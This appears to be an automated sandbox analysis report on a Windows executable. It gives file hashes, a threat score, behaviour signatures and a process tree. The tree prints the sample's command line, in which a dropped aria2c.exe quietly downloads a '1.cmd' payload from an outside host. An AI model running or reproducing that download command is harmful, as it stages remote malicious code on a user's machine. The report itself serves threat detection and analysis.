e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f

Analysis

max time kernel
106s
max time network
122s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
03/02/2024, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
Size

1.9MB
MD5

61e62e70e51eeba5c6041960dcbb47a5
SHA1

94213db89c31c5314378b2ec6e1859cd83610530
SHA256

e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f
SHA512

e0c1270ef1252a8d029c383b5de46eef09369ace186eb7f6a43fb925d5dbc492faa9ee116b3f18ecc1cc73d345201b80746d9c501765edc8d5b44a9c3c2e1a0f
SSDEEP

49152:peqiGLHnKt1f2LSSlaugdgqeZzD0z2dJDK3Shz4JHbjQHv3RHAygA0:peNGOci2qDCdJWDi+W0

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
1748	aria2c.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4460 wrote to memory of 1748	4460	e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe	88
PID 4460 wrote to memory of 1748	4460	e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe	88

C:\Users\Admin\AppData\Local\Temp\e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe
"C:\Users\Admin\AppData\Local\Temp\e5b3678e9c9efcf1b87d45a590f467f7c7a14374084ac5d0b6bc857db9206b6f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4460
- C:\Users\Administrator\lgx\aria2c.exe
  "C:\Users\Administrator\lgx\aria2c.exe" --quiet --allow-overwrite=true -d "C:\Users\Administrator\lgx" -o 1.cmd "https://vip.123pan.cn/1814328088/gtx/551.23/ykd"
  2⤵
  - Executes dropped EXE
  PID:1748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Administrator\lgx\aria2c.exe

Filesize
2.6MB

MD5
d99d41c6b65ed49193edbaab0e42b065

SHA1
96890c38365a6c70690d315ae066ede06bf55ca9

SHA256
37a1b55cabb619853005979a7939441b6ccec452d33961d2c5118a615717e43b

SHA512
2e5473468326515541e34090e5e118deb8b31cdd5faaf56c3387dae2baff920fefbbfa5142a902773c483be2bf40f811715ae7643700be18a3b6aaf3a0a4741b

Download Submit
C:\Users\Administrator\lgx\aria2c.exe

Filesize
1.5MB

MD5
2c0a43ee2a86f1bee3dd383c32095aa5

SHA1
7464f77e102c71739fd23c49f3317833c3699133

SHA256
090319fbcd6e623f7e14346ad4c514ea4726e5295935a600c75daaf5a23df65f

SHA512
2bc26e9bdc7c6e435f9b22ac0bc8004156479342c68dee4b5f32110f6be3729163960013934a2a00889ed7aa12b178c9b216f37d2b3eb6c0947ac45f089b912a

Download Submit
memory/1748-4-0x00007FF7B3D90000-0x00007FF7B42FD000-memory.dmp

Filesize
5.4MB

Download
memory/1748-14-0x00007FF7B3D90000-0x00007FF7B42FD000-memory.dmp

Filesize
5.4MB

Download